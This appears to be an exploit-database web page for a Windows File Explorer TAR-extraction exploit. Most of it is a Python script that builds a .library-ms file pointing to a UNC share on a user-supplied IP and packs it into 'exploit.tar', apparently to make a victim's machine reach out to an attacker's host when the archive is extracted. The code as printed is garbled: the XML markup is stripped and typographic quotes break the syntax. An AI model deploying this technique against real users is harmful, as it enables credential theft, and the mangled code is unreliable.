Windows File Explorer Windows 10 Pro x64 – TAR Extraction

Exploit Details

Basic Information

Exploit Title Windows File Explorer Windows 10 Pro x64 – TAR Extraction
Exploit ID EDB-ID:52325
Type exploitdb
Published 2025-06-13T00:00:00
Modified 2025-06-13T00:00:00

CVSS Information

CVSS Score 0.0
Severity NONE
Vector NONE

CVE Information

Exploit Description

import os import tarfile def main(): file_name = input("Enter your file name: ") ip_address = input("Enter IP (EX: 192.168.1.162): ") library_content = f"""<?xml version="1.0" encoding="UTF-8"?> …

Exploit Code

import os

import tarfile

def main():

file_name = input(“Enter your file name: “)

ip_address = input(“Enter IP (EX: 192.168.1.162): “)

library_content = f”””







\\\\{ip_address}\\IT







“””

library_file_name = f”{file_name}.library-ms”

with open(library_file_name, “w”, encoding=”utf-8″) as f:

f.write(library_content)

tar_name = “exploit.tar”

with tarfile.open(tar_name, “w”) as tarf:

tarf.add(library_file_name)

if os.path.exists(library_file_name):

os.remove(library_file_name)

print(“completed”)

if __name__ == “__main__”:

main()

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.